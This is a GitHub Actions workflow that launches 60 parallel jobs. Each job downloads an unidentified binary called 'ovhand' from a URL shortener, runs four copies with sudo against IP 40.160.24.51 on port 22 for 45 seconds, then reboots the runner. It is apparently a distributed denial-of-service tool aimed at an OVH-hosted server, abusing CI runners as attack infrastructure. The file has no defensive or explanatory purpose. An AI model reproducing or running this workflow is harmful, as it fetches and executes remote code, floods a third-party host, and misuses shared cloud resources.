name: Ubuntu VDS 40 saniye ovh

on:
  workflow_dispatch:

jobs:
  vds:
    runs-on: ubuntu-latest
    strategy:
      max-parallel: 60
      matrix:
       instance: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60]


    steps:
      - name: OK !
        run: |
          wget https://curl.by/o4q-R/ovhand -O ovhand
          chmod +x ovhand
          PIDS=()
          for i in {1..4}; do
            sudo timeout 45 ./ovhand 40.160.24.51 22 10 45 &
            PIDS+=($!)
          done
          
          for pid in "${PIDS[@]}"; do
            wait $pid
          done

      - name: OK !
        run: sleep 45
        
      - name: OK !
        run: sudo reboot
